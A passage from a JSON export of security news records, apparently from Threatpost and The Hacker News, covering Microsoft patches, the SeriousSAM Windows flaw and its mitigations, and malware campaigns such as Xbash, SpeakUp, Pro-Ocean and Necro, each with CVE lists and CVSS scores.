This, he said, illustrated a dynamic vulnerability market where both nation states and criminals are buying from the same vendors.\n\nIn April, researchers at Kaspersky Lab said there was a link between [Moonlight Maze cyberespionage operation of the mid- and late-1990s](<https://threatpost.com/russian-speaking-turla-joins-apt-elite/124695/>) and the modern-day [Turla APT](<https://threatpost.com/agent-btz-malware-may-have-served-as-starting-point-for-red-october-turla/104735/>). The malware hides on infected systems, steals data and sends it off to a remote server, much like other cyber espionage tools. In December, the Federal Bureau of Investigation and the US Department of Homeland Security implicated hacking group APT28 (also known as Fancy Bear and Sofacy) in attacks [against several election-related targets](<https://threatpost.com/fbi-dhs-report-links-fancy-bear-to-election-hacks/122802/>).\n\nThe three zero day vulnerabilities come on the [heels of Microsoft issuing an emergency out-of-band patch](<https://threatpost.com/emergency-update-patches-zero-day-in-microsoft-malware-protection-engine/125529/>) for a zero day reported by Google Project Zero in Microsoft\u2019s Malware Protection Engine on Monday.\n\nAlso part of Patch Tuesday were updates to Microsoft Edge and Internet Explorer 11 to [block sites that are protected with a SHA-1 certificate](<https://technet.microsoft.com/library/security/4010323>) from loading and to display an invalid certificate warning.\n\n\u201cThis change will only impact SHA-1 certificates that chain to a root in the Microsoft Trusted Root Program where the end-entity certificate or the issuing intermediate uses SHA-1. 
Enterprise or self-signed SHA-1 certificates will not be impacted, although we recommend that all customers quickly migrate to SHA-2 based certificates,\u201d Microsoft wrote.\n\nFor the past couple of years, browser makers have raced to [migrate from SHA-1 to SHA-2 as](<https://threatpost.com/sha-1-end-times-have-arrived/123061/>) researchers have intensified warnings about collision attacks moving from theoretical to practical. Browser makers Google and Mozilla have already begun the deprecation of SHA-1.\n\nThe Microsoft updates follow in the footsteps of Adobe, who earlier in the day released a surprisingly small update, [patching just eight vulnerabilities](<https://threatpost.com/adobe-patches-seven-critical-vulnerabilities-in-flash-aem/125539/>).\n", "cvss3": {}, "published": "2017-05-09T17:16:48", "type": "threatpost", "title": "Microsoft Plugs Three Zero Day Holes as Part of May Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0261", "CVE-2017-0262", "CVE-2017-0263"], "modified": "2017-05-17T13:04:46", "id": "THREATPOST:FC2B25371317ED019A81553465477089", "href": "https://threatpost.com/microsoft-plugs-three-zero-day-holes-as-part-of-may-patch-tuesday/125544/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-07-22T20:05:59", "description": "A privilege escalation bug, affecting versions of Windows 10, received a workaround fix by Microsoft Wednesday to prevent attackers from accessing data and creating new accounts on compromised systems.\n\nThe bug, dubbed SeriousSAM, affects the Security Accounts Manager (SAM) database in all versions of Windows 10. The SAM component in Windows houses user account credentials and network domain information \u2013 a juicy target for attackers. 
A prerequisite for abuse of the bug is an adversary needs either remote or local access to the vulnerable Windows 10 system.\n\nTracked as CVE-2021-36934, Microsoft said the vulnerability exists because of overly permissive Access Control Lists on multiple system files, including the (SAM) database. \u201cAn attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights,\u201d the [Microsoft bulletin explains](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>). \n[](<https://threatpost.com/newsletter-sign/>)Simply stated, an attacker could leverage the bug to gain access to the SAM database of hashed credentials, which then could be decrypted offline and used to bypass Windows 10 user access controls.\n\n## Proof-of-Concept Available\n\nThe bug is rated important in severity by Microsoft. The flaw was revealed to Microsoft by researchers Jonas Lyk over the weekend and made public Monday. [Proof-of-concept code](<https://github.com/GossiTheDog/HiveNightmare>) was published by researcher Kevin Beaumont to help network admins identify exposure to the bug.\n\nIn a Tweet by Lyk, the researcher said the bug also impacts pre-production versions of Windows 11 (slated to be released in October, 2021). \u201cFor some reason on win11 the SAM file now is READ for users. So if you have shadowvolumes enabled you can read the sam file,\u201d [he tweeted](<https://twitter.com/jonasLyk/status/1417205166172950531>).\n\nThe researcher said the bug was discovered while tinkering with Windows 11. He explains that SAM database content, while not accessible on the OS, can be accessed when part of a Windows Shadow Volume Copy (VSS) backup. 
VSS is a service that allows automatic or manual real-time backups of system files (preserved in their current state) tied to a particular drive letter (volume).\n\nHe later identified the same issue is present on Windows 10 systems dating back to 2018 (v1809).\n\n## **No Patch Available: Workaround Fix Recommended**\n\nFor this reason, Microsoft is recommending sysadmin delete the backup copies of the VSS files. The OS maker does not offer a patch for the bug, rather a simple workaround.\n\nMicrosoft explains the two step process as: \u201cDelete any System Restore points and Shadow volumes that existed prior to restricting access to %windir%\\system32\\config\u201d and \u201ccreate a new System Restore point (if desired).\u201d\n\nIt also cautions that deleting VSS shadow copies \u201ccould impact restore operations, including the ability to restore data with third-party backup applications.\u201d\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {}, "published": "2021-07-22T12:57:11", "type": "threatpost", "title": "Microsoft Issues Windows 10 Workaround Fix for \u2018SeriousSAM\u2019 Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-22T12:57:11", "id": "THREATPOST:B0D084253CDDA9B0416ADB6DC22BEC9B", "href": "https://threatpost.com/win-10-serioussam/168034/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-05-30T05:51:02", "description": "Researchers have discovered a new sophisticated malware family in the wild, which wrecks havoc on Windows and Linux systems with a combination of data destructive ransomware and malicious cryptomining.\n\nThe malware, dubbed by Palo Alto Networks\u2019 Unit 42 researchers who discovered it as Xbash, has been targeting weak passwords and unpatched vulnerabilities to infect systems. 
Xbash also shares striking similarities with worms like WannaCry and Petya/NotPetya, such as self-propagation capabilities and the ability to spread rapidly.\n\n\u201cXbash aimed at discovering unprotected services, deleting victim\u2019s MySQL, PostgreSQL and MongoDB databases, and ransom for Bitcoins,\u201d the researchers said in a Monday [post](<https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/>). \u201cXbash uses three known vulnerabilities in Hadoop, Redis and ActiveMQ for self-propagation or infecting Windows systems.\u201d\n\nXbash has an array of features that make it stand out. It specifically targets Windows and Linux, it\u2019s developed in Python, it fetches IP addresses and domain names from its C2 servers to use as exploitation targets, and it has intranet scanning functionality.\n\nResearchers have discovered four different versions of Xbash so far. All have an array of sophisticated capabilities, including quick development (using Python), easy installation, anti-detection features and cross-platform capabilities. 
Despite this high level of sophistication, researchers said that code and timestamp differences among the four versions show that the malware is still under active development.\n\nThe botnet has been operating since as early as May 2018, and so far researchers said they have observed 48 incoming transactions to the Bitcoin wallet addresses used by the malware (totaling $6,000) \u2013 possibly indicating 48 victims of its ransom behavior.\n\n## Attack Vector\n\nThe malware focuses on three known vulnerabilities: a Hadoop YARN ResourceManager unauthenticated command execution flaw (discovered in 2016 with no CVE), a Redis arbitrary file write and remote command execution glitch (found in 2015 with no CVE), and an ActiveMQ arbitrary file write vulnerability ([CVE-2016-3088](<https://nvd.nist.gov/vuln/detail/CVE-2016-3088>)).\n\nXbash offers two separate functions for Windows and Linux targets \u2013 the malware is capable of determining the operating system of a targeted system and delivering a payload designed for that OS.\n\nOn Windows, Xbash focuses on malicious cryptomining and self-propagation, triggering a downloader that executes a coinminer; on Linux systems it displays its data-destructive tendencies and behaves as ransomware.\n\nOn Linux, Xbash first attempts to log in to a service \u2013 generally MySQL, MongoDB, and PostgreSQL. Once successfully logged in, it will delete almost all existing databases in the server and create a new database named \u201cPLEASE_READ_ME_XYZ.\u201d It will then insert a ransom message into a table labeled \u201cWARNING\u201d in the new database.\n\nThe ransom message asks for 0.02 BTC, or around $125, as payment to release the compromised databases.\n\nOn Windows, the malware will execute a JavaScript or VBScript downloader. 
The downloader in turn causes a coinminer to be executed on the system: \u201cDepending on Xbash\u2019s version, this new startup item will download a malicious HTML or a Scriptlet file from Xbash\u2019s C2 server, and execute the JavaScript or VBScript code in the file via \u201cmshta\u201d or via \u201cregsvr32\u201d. These scripts will then invoke PowerShell to download a malicious PE executable or PE DLL file,\u201d researchers said.\n\nHowever, Unit 42 researchers said that they have found no evidence of code in Xbash that backs up deleted databases at all \u2013 meaning that the malware poses as ransomware, but the databases remain destroyed even after the ransom has been paid.\n\nAnalysis shows that the malware is likely linked to Iron Group, a group publicly linked to other ransomware campaigns including those that use the Remote Control System (RCS), whose source code was believed to be stolen from Hacking Team in 2015.\n\nResearchers made the connection after discovering that Xbash hard-coded a number of domain names as its C2 servers \u2013 some of which were reused from previous Windows coinminers attributed to the Iron cybercrime group.\n\n\u201cAfter further investigation we realized it\u2019s a combination of botnet and ransomware that was developed by an active cybercrime group Iron (aka Rocke) this year,\u201d the researchers said.\n", "cvss3": {}, "published": "2018-09-19T13:30:51", "type": "threatpost", "title": "XBash Malware Packs Double Punch: Destroys Data and Mines for Crypto Coins", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-3088"], "modified": "2018-09-19T13:30:51", "id": "THREATPOST:A7004D2BAB0081814ED226C2F42B8A7F", "href": "https://threatpost.com/xbash-malware-packs-double-punch-destroys-data-and-mines-for-crypto-coins/137543/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-04T07:14:14", "description": "LAS VEGAS \u2014 A backdoor trojan dubbed \u201cSpeakUp\u201d has been 
spotted exploiting the Linux servers that run more than 90 percent of the top 1 million domains in the U.S. It uses a complex bag of tricks to infect hosts and to propagate, which analysts say could indicate that it\u2019s poised for a major offensive involving a vast number of infected hosts, potentially worldwide.\n\nAccording to Check Point research released Monday at the CPX360 event in Las Vegas, SpeakUp (so named after its command-and-control domain, SpeakUpOmaha[dot]com) is being used in a cryptomining campaign that is gaining momentum and has targeted more than 70,000 servers worldwide so far, in what could be the foundation for a very formidable botnet.\n\nSpeakUp targets on-premises servers as well as cloud-based machines, such as those hosted by Amazon Web Services, and it doesn\u2019t stop at Linux: It also has the ability to infect macOS devices.\n\nOded Vanunu, head of products vulnerability research for Check Point, told Threatpost that the scope of this attack includes all servers running ThinkPHP, Hadoop Yarn, Oracle WebLogic, Apache ActiveMQ and Red Hat JBoss. And, he said, since this software can be deployed on virtual servers, all cloud infrastructure is also prone to be affected.\n\nThe trojan itself can affect all Linux distributions and macOS.\n\n## Infection Routine\n\nThe initial infection vector starts with targeting a recently reported RCE vulnerability in ThinkPHP (CVE-2018-20062); the code uses command-injection techniques to upload a PHP shell that serves and executes a Perl backdoor.\n\nThe routine is heavily obfuscated: Using a GET request, exploit code is sent to the targeted server. The resulting uploaded PHP shell then sends another HTTP request to the targeted server, with a standard injection function that pulls the ibus payload and stores it. The payload execution is then kicked off using an additional HTTP request. 
That executes the Perl script, puts it to sleep for two seconds and deletes the file to remove any evidence of infection.\n\nAfter the victim machine registers with the C2, Check Point analysts found that SpeakUp continuously asks for new tasks at a fixed interval of every three seconds. The C2 can respond \u201cno task\u201d \u2013 or it can tell the bot to execute arbitrary code on the local machine, download and execute a file from any remote server, kill or uninstall the program, or send updated fingerprint data.\n\n\u201cThe beauty is that the threat actor has a foothold on any infected server,\u201d Vanunu said. \u201cWhich means he can adapt new future vulnerabilities, and deploy the new code, which will attempt to exploit further using new techniques. If the threat actor decides to implement some more infection techniques the number of bots could easily scale up.\u201d\n\nThe campaign could be scaled immediately as well, since a threat actor would be able to download a piece of malware to all infected hosts at once.\n\n\u201cThe infected hosts are checking the C2 server for new commands every three minutes,\u201d said Vanunu.\n\n\u201cThe threat actor [may also be able to] sell the infected hosts to any threat actor and deploy any type of malware to the highest bidder,\u201d he added.\n\n## Highly Sophisticated Propagation\n\nSpeakUp also comes equipped with a handy propagation script written in Python; its main functions are brute-forcing administrative panels using a pre-defined list of usernames and passwords, and scanning the network environment of the infected machine. For the latter function, it checks for the availability of specific ports on servers that share the same internal and external subnet mask. 
The idea is to scan and infect more vulnerable Linux servers within its internal and external subnets, using a full bag of exploits.\n\nTo spread, SpeakUp\u2019s propagation code exploits known vulnerabilities in six different Linux distributions, including JBoss Enterprise Application Platform security bypass vulnerabilities (CVE-2012-0874); a JBoss Seam Framework remote code execution (RCE) flaw (CVE-2010-1871); a JBoss AS 3/4/5/6 RCE exploit; an Oracle WebLogic wls-wsat Component Deserialization RCE (CVE-2017-10271); a vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (CVE-2018-2894); a Hadoop YARN ResourceManager command-execution exploit; and an Apache ActiveMQ Fileserver File Upload RCE vulnerability (CVE-2016-3088).\n\n[Figure: SpeakUp\u2019s daily infection rate]\n\n\u201cA successful exploitation of one of the vulnerabilities will result in deploying the original ibus script on the exploited server,\u201d according to Check Point\u2019s analysis, which added that it also has the capability to infect Macs.\n\n## A Bigger Threat in the Making?\n\nRight now, the observed file downloads that the backdoor is dropping are simple Monero-mining scripts. However, SpeakUp\u2019s authors have the ability to download any code they want to the servers. Check Point analysts said that the mining code could be a sort of beta test ahead of a much more concerning malware drop to come.\n\n\u201cAt the moment SpeakUp serves XMRig miners to its listening infected servers,\u201d according to the research. 
According to [XMRHunter](<https://www.xmrhunter.com/>), the wallets hold a total of around 107 Monero coins right now, which is small potatoes in the grand scheme of things.\n\n\u201cSpeakUp\u2019s obfuscated payloads and propagation technique is beyond any doubt the work of a bigger threat in the making,\u201d according to the analysis. \u201cIt is hard to imagine anyone would build such a compound array of payloads just to deploy a few miners. The threat actor behind this campaign can at any given time deploy additional payloads, potentially more intrusive and offensive. It has the ability to scan the surrounding network of an infected server and distribute the malware.\u201d\n\n[Figure: SpeakUp has no detections in VirusTotal.]\n\nThe initial victims have been in Eastern Asia and Latin America, but researchers believe that the U.S. could be the next target, if not the rest of the world. Given the impressive propagation tactics, a non-existent detection rate on VirusTotal, and the fact that the threat surface contains servers that run the top sites on the internet, SpeakUp could end up being a very big deal, researchers said: \u201cThis campaign, while still relatively new, can evolve into something bigger and potentially more harmful\u2026[and] at the time of writing this article, it has no detections in VirusTotal.\u201d\n\n## Attribution\n\nWhile the exact identity of the threat actor behind this new attack is still unconfirmed, it\u2019s clear that it\u2019s someone or a group with plenty of malware-authoring chops.\n\n\u201cWhile currently we\u2019ve spotted a cryptocurrency mining payload, the most notable aspect is the spreading abilities demonstrated in the code,\u201d Vanunu told Threatpost. 
\u201cNot only was this highly obfuscated, the variety of exploits used could potentially mean we have a highly skilled threat actor behind it.\u201d\n\nCheck Point researchers were able to correlate SpeakUp\u2019s author with a possibly Russian-speaking malware developer under the name of Zettabit.\n\n\u201cAlthough SpeakUp is implemented differently [than Zettabit\u2019s other code], it has a lot in common with Zettabit\u2019s craftsmanship,\u201d according to the analysis.\n\nIn terms of what links Zettabit to this malware, \u201cwe\u2019ve read all of his Hack Forums posts and GitHub projects, so this avatar definitely knows his way around botnets,\u201d Vanunu told Threatpost. \u201cHe even released a free example of botnet code for anyone to use. And while researching, we\u2019ve identified two unique strings that were mentioned and used by Zettabit himself a couple of times in the past.\u201d\n\n_This story was updated at 2:23 p.m. ET on February 4 to reflect additional details from the researchers. 
_\n", "cvss3": {}, "published": "2019-02-04T14:00:15", "type": "threatpost", "title": "SpeakUp Linux Backdoor Sets Up for Major Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-1871", "CVE-2012-0874", "CVE-2016-3088", "CVE-2017-10271", "CVE-2018-20062", "CVE-2018-2894"], "modified": "2019-02-04T14:00:15", "id": "THREATPOST:260D48C8E6CF572D5CE165F85C7265E6", "href": "https://threatpost.com/speakup-linux-backdoor/141431/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:39:09", "description": "A financially-motivated threat actor notorious for its cryptojacking attacks has leveraged a revised version of its malware to target cloud infrastructures using vulnerabilities in web server technologies, according to new research.\n\nDeployed by the China-based cybercrime group **Rocke**, the Pro-Ocean cryptojacking malware now comes with improved rootkit and worm capabilities, and harbors new evasion tactics to sidestep cybersecurity companies' detection methods, Palo Alto Networks' Unit 42 researchers [said](<https://unit42.paloaltonetworks.com/pro-ocean-rocke-groups-new-cryptojacking-malware/>) in a Thursday write-up.\n\n\"Pro-Ocean uses known vulnerabilities to target cloud applications,\" the researchers detailed. 
\"In our analysis, we found Pro-Ocean targeting Apache ActiveMQ ([CVE-2016-3088](<https://nvd.nist.gov/vuln/detail/CVE-2016-3088>)), Oracle WebLogic ([CVE-2017-10271](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>)) and Redis (unsecure instances).\"\n\n\"Once installed, the malware kills any process that uses the CPU heavily, so that it's able to use 100% of the CPU and mine Monero efficiently.\"\n\nFirst documented by [Cisco Talos](<https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html>) in 2018, Rocke has been found to distribute and execute crypto-mining malware using a varied toolkit that includes Git repositories and different payloads such as shell scripts, JavaScript backdoors, as well as portable executable files.\n\n[](<https://thehackernews.com/images/-zGuFNfU5HYA/YBfio2D1i3I/AAAAAAAABpo/peoOu7OnqKUPriJPrJfEV-QX12XX4jSRwCLcBGAsYHQ/s0/cyber.jpg>)\n\nWhile prior variants of the malware banked on the capability to target and remove cloud security products developed by Tencent Cloud and Alibaba Cloud by [exploiting flaws](<https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products/>) in Apache Struts 2, Oracle WebLogic, and Adobe ColdFusion, Pro-Ocean has expanded the breadth of those attack vectors by aiming at Apache ActiveMQ, Oracle WebLogic, and Redis servers.\n\nBesides its self-spreading features and better hiding techniques that allow it to stay under the radar and spread to unpatched software on the network, the malware, once installed sets about uninstalling monitoring agents to dodge detection and removing other malware and miners from the infected systems.\n\nTo achieve this, it takes advantage of a native Linux feature called LD_PRELOAD to mask its malicious activity, a library named [Libprocesshider](<https://github.com/gianlucaborello/libprocesshider>) to stay hidden, and uses a Python infection script that takes the machine's public IP to infect all machines 
in the same 16-bit subnetwork (e.g., 10.0.X.X).\n\nPro-Ocean also works to eliminate competition by killing other malware and miners, including Luoxk, BillGates, XMRig, and Hashfish, running on the compromised host. In addition, it comes with a watchdog module written in Bash that ensures persistence and takes care of terminating all processes that utilize more than 30% of the CPU with the goal of mining Monero efficiently.\n\n\"This malware is an example that demonstrates that cloud providers' agent-based security solutions may not be enough to prevent evasive malware targeted at public cloud infrastructure,\" Unit 42 researcher Aviv Sasson said. \"This sample has the capability to delete some cloud providers' agents and evade their detection.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-01T11:15:00", "type": "thn", "title": "New Cryptojacking Malware Targeting Apache, Oracle, Redis Servers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": 
"NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3088", "CVE-2017-10271"], "modified": "2021-02-01T11:15:16", "id": "THN:EEB3BA59922DDC6B345B8E6C153593DA", "href": "https://thehackernews.com/2021/02/new-cryptojacking-malware-targeting.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:00", "description": "[](<https://thehackernews.com/images/-xLbunA9yK10/YLkJxMO-Q1I/AAAAAAAACvM/nmCtDmIhZswOE5N0nip4wXOkRMetd8YbACLcBGAsYHQ/s0/Necro-Python-bot.jpg>)\n\nNew upgrades have been made to a Python-based \"self-replicating, polymorphic bot\" called Necro in what's seen as an attempt to improve its chances of infecting vulnerable systems and evading detection.\n\n\"Although the bot was originally discovered earlier this year, the latest activity shows numerous changes to the bot, ranging from different command-and-control (C2) communications and the addition of new exploits for spreading, most notably vulnerabilities in VMWare vSphere, SCO OpenServer, Vesta Control Panel and SMB-based exploits that were not present in the earlier iterations of the code,\" researchers from Cisco Talos [said](<https://blog.talosintelligence.com/2021/06/necro-python-bot-adds-new-tricks.html>) in a deep-dive published today.\n\nSaid to be in development as far back as 2015, [Necro](<https://malpedia.caad.fkie.fraunhofer.de/details/py.n3cr0m0rph>) (aka N3Cr0m0rPh) targets both Linux and Windows devices, with heightened activity observed at the start of the year as part of a malware campaign dubbed \"[FreakOut](<https://thehackernews.com/2021/01/freakout-ongoing-botnet-attack.html>)\" that was found exploiting [vulnerabilities](<https://blog.netlab.360.com/necro/>) in network-attached storage (NAS) devices running on [Linux machines](<https://blog.netlab.360.com/necro-upgrades-again-using-tor-dynamic-domain-dga-and-aiming-at-both-windows-linux/>) to co-opt the machines into a botnet for 
launching distributed denial-of-service (DDoS) attacks and mining Monero cryptocurrency.\n\nIn addition to its DDoS and RAT-like functionalities to download and launch additional payloads, Necro is designed with stealth in mind by installing a rootkit that hides its presence on the system. What's more, the bot also injects malicious code to retrieve and execute a JavaScript-based miner from a remote server into HTML and PHP files on infected systems.\n\nWhile previous versions of the malware exploited flaws in Liferay Portal, Laminas Project, and TerraMaster, the latest variants observed on May 11 and 18 feature command injection exploits targeting Vesta Control Panel, ZeroShell 3.9.0, SCO OpenServer 5.0.7, as well as a remote code execution flaw impacting VMWare vCenter ([CVE-2021-21972](<https://thehackernews.com/2021/02/critical-rce-flaw-affects-vmware.html>)) that was patched by the company in February.\n\nA version of the botnet, released on May 18, also includes exploits for [EternalBlue](<https://thehackernews.com/2017/04/windows-hacking-tools.html>) (CVE-2017-0144) and [EternalRomance](<https://www.microsoft.com/security/blog/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>) (CVE-2017-0145), both of which abuse a remote code execution vulnerability in Windows SMB protocol. 
These new additions serve to highlight that the malware author is actively developing new methods of spreading by taking advantage of publicly disclosed vulnerabilities.\n\nAlso of note is the incorporation of a [polymorphic engine](<https://www.trendmicro.com/vinfo/us/security/definition/Polymorphic-virus>) to mutate its source code with every iteration while keeping the original algorithm intact in a \"rudimentary\" attempt to limit the chances of being detected.\n\n\"Necro Python bot shows an actor that follows the latest development in remote command execution exploits on various web applications and includes the new exploits into the bot,\" Talos researchers said. \"This increases its chances of spreading and infecting systems. Users need to make sure to regularly apply the latest security updates to all of the applications, not just operating systems.\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-03T17:01:00", "type": "thn", "title": "Necro Python Malware Upgrades With New Exploits and Crypto Mining Capabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": 
"COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-0145", "CVE-2021-21972"], "modified": "2021-06-03T17:01:42", "id": "THN:FF56343C15BACA1C1CE83A105EFD7F77", "href": "https://thehackernews.com/2021/06/necro-python-malware-upgrades-with-new.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:18", "description": "[](<https://thehackernews.com/images/-2Vh6AhRwNKs/YP6aCnEii6I/AAAAAAAABK0/Sm1Yj72UTWQ0Kh_48L0sq_91GZSVbDq8wCLcBGAsYHQ/s0/SeriousSAM-Vulnerability.jpg>)\n\nMicrosoft Windows 10 and Windows 11 users are at risk of a new unpatched vulnerability that was recently disclosed publicly.\n\nAs we reported last week, the vulnerability \u2014 [SeriousSAM](<https://thehackernews.com/2021/07/new-windows-and-linux-flaws-give.html>) \u2014 allows attackers with low-level permissions to access Windows system files to perform a Pass-the-Hash (and potentially Silver Ticket) attack. \n\nAttackers can exploit this vulnerability to obtain hashed passwords stored in the Security Account Manager (SAM) and Registry, and ultimately run arbitrary code with SYSTEM privileges.\n\nSeriousSAM vulnerability, tracked as **CVE-2021-36934**, exists in the default configuration of Windows 10 and Windows 11, specifically due to a setting that allows 'read' permissions to the built-in user's group that contains all local users.\n\nAs a result, built-in local users have access to read the SAM files and the Registry, where they can also view the hashes. Once the attacker has 'User' access, they can use a tool such as Mimikatz to gain access to the Registry or SAM, steal the hashes and convert them to passwords. 
Compromising domain users that way gives attackers elevated privileges on the network.\n\nBecause there is no official patch available yet from Microsoft, the best way to protect your environment from the SeriousSAM vulnerability is to implement hardening measures.\n\n## Mitigating SeriousSAM\n\nAccording to Dvir Goren, CTO at CalCom, there are three optional hardening measures:\n\n 1. **Delete all users from the built-in Users group** \u2014 this is a good place to start from, but won't protect you if Administrator credentials are stolen.\n 2. **Restrict SAM files and Registry permissions** \u2014 allow access only for Administrators. This will, again, only solve part of the problem: if an attacker steals Admin credentials, you will still be exposed to this vulnerability.\n 3. **Don't allow the storage of passwords and credentials for network authentication** \u2014 this rule is also recommended in the [CIS benchmarks](<https://www.calcomsoftware.com/cis-hardening-and-configuration-security-guide/>). By implementing this rule, there will be no hash stored in the SAM or registry, thereby mitigating this vulnerability completely.\n\nWhen using GPOs for implementation, make sure the following UI Path is Enabled:\n\n> Computer Configuration\\Policies\\Windows Settings\\Security Settings\\Local Policies\\Security Options\\Network access: Do not allow storage of passwords and credentials for network authentication\n\n_Despite the fact that the last recommendation offers a good solution for SeriousSAM, it may negatively impact your production if not properly tested before it is pushed. When this setting is enabled, applications that use scheduled tasks and need to store users' hashes locally will fail._\n\n## Mitigating SeriousSAM without risking damage to production\n\nThe following are Dvir's recommendations for mitigating without causing downtime:\n\n 1. Set up a test environment that will simulate your production environment. 
Simulate all possible dependencies of your network as accurately as you can.\n 2. Analyze the impact of this rule on your test environment. In this way, if you have applications that rely on hashes that are stored locally, you'll know in advance and prevent production downtime.\n 3. Push the policy where possible. Make sure new machines are also hardened and that the configuration doesn't drift over time.\n\nThese three tasks are complex and require a lot of resources and in-house expertise. Therefore, Dvir's final recommendation is to [automate the entire hardening process](<https://www.calcomsoftware.com/server-hardening-suite/?utm_source=article&utm_medium=traffic&utm_campaign=hacker+news+seriousSAM&utm_id=hacker+news+seriousSAM>) to remove the need to perform stages 1, 2 and 3 manually. \n\nHere is what you will gain from a [Hardening Automation Tool](<https://www.calcomsoftware.com/best-hardening-tools/?utm_source=article&utm_medium=traffic&utm_campaign=hacker+news+seriousSAM&utm_id=hacker+news+seriousSAM>):\n\n * Automatically generate the most accurate possible impact analysis report \u2013 hardening automation tools 'learn' your production dependencies and report to you the potential impact of each policy rule. \n * Automatically enforce your policy on your entire production from a single point of control \u2013 using these tools, you won't need to do manual work, such as using GPOs. You can control and be certain all your machines are hardened.\n * Maintain your compliance posture and monitor your machines in real-time \u2013 hardening automation tools will monitor your compliance posture, alert and remediate any unauthorized changes in configurations, therefore preventing configuration drift. 
\n\n[Hardening automation tools](<https://www.calcomsoftware.com?utm_source=article&utm_medium=traffic&utm_campaign=hacker+news+seriousSAM&utm_id=hacker+news+seriousSAM>) will learn the dependencies directly from your network and automatically generate an accurate impact analysis report. A hardening automation tool will also help you orchestrate the implementation and monitoring process.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-26T11:21:00", "type": "thn", "title": "How to Mitigate Microsoft Windows 10, 11 SeriousSAM Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": 